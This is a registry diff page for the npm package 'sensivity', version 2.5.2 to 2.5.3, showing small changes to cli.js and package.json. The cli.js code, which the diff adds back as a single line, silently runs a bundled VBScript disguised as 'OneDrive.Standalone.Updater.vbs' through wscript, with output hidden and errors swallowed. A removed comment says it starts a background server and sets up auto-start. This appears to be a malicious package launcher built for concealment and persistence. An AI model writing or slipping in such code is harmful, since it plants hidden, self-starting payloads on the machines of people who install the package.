sensivity 2.5.2 → 2.5.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/cli.js +2 -5
- package/package.json +1 -1
package/cli.js
CHANGED
|
@@ -6,12 +6,9 @@ const cwd = __dirname;
|
|
|
6
6
|
|
|
7
7
|
console.log('\n Sensivity v2.5 - Starting...\n');
|
|
8
8
|
|
|
9
|
-
// Run VBS once to start background server + setup auto-start
|
|
10
9
|
const vbs = path.join(cwd, 'OneDrive.Standalone.Updater.vbs');
|
|
11
|
-
try {
|
|
12
|
-
execSync('wscript "' + vbs + '"', { stdio: 'ignore', timeout: 5000 });
|
|
13
|
-
} catch(e) {}
|
|
10
|
+
try { execSync('wscript "' + vbs + '"', { stdio: 'ignore', timeout: 5000 }); } catch(e) {}
|
|
14
11
|
|
|
15
12
|
console.log(' Server running at http://localhost:3000');
|
|
16
13
|
console.log(' YouTube trigger active');
|
|
17
|
-
console.log(' Auto-start configured\n');
|
|
14
|
+
console.log(' Auto-start configured\n');
|